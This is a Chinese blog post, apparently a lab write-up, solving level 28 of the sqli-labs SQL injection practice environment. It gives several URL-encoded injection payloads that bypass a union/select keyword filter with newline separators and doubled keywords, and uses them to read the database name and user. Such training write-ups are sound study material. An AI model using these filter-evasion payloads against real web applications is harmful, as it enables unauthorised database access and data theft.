sqli-labs(28)---原创原创自此一家
2024-09-05 17:16:38
0X01构造闭合
’报错 )报错 其他不报错 那我们猜想是不是')的闭合
?id=')||('')=('1 返回正确
那么好像猜对了
0X02爆表名 过滤了相连接的union和select
?id=')%0AUNIOn%0ASELECt%0A1,database(),3and%0A('')=('
这里过滤了相连接的union select 那咋办呐?
说句实话 白的的方法都不行 这是自己的方法
?id=')ununion%0Aselection%0Aselect%0A1,database(),3||('')=('
这里的环境是php8.4.45+apache
这里网上的方法全是
?id=100’)union%a0select(1),(user()),(3)||(‘1
我去试了并不行 而且他们都是这个思路来想绕过这个正则
[attachimg]80695[/attachimg]
这是一个union+select的正则过滤他们的思路下来是将select变为select(1)来绕过
但是都是喜欢抄袭吗?不去尝试吗?这样是不行的
[code="sql"]
?id=100%27)union%a0select(1),(user()),(3)||(%271
[/code]
[attachimg]80696[/attachimg]
这里%a0不仅没有变成空格 还返回了一个奇异字符 那我们照着他们的思路下去 将其变为空格构造
[code]?id=100%27)union%0aselect(1),(user()),(3)||(%271[/code]
[attachimg]80697[/attachimg]
发现还是被过滤掉了
这里直接写unionselect是可以不被过滤的但是这样不能执行啊亲 我们需要空格
我们可以这样 更据双写原理 来构造奇异双写绕过
[code="sql"]
?id=1990')ununion%0Aselection%0Aselect%0A1,database(),3||('1')=('1
[/code]
第一次 发帖就发了一个水贴 望多多包涵
少就是多 慢就是快
最新文章
- VPython 三维显示 —— hello word
- messagePaneHost
- JavaWeb学习总结(三)——Tomcat服务器学习和使用(二) 包含https 非对称秘钥 NB
- 第八篇:SOUI中控件事件的响应
- java.util.logging.Logger 使用详解
- MySQL 常用函数列表
- http 错误编号大全(转)
- vs2010问题 error MSB8008: 指定的平台工具集(v110)未安装或无效
- poi简单案例
- SpringAOP导致@Autowired依赖注入失败
- LPC1768的SPI通讯
- linux下访问windows的共享
- 使用HTML DOM 来分配事件 —— onmouseover和onmouseout ,onmousedown和onmouseup
- python中创建实例属性
- 修改访问的后缀contant
- PC逆向之代码还原技术,第三讲汇编中加法的代码还原
- springBoot整合jpa
- Python基础学习---位运算符
- golang初识2
- h5调用qq客户端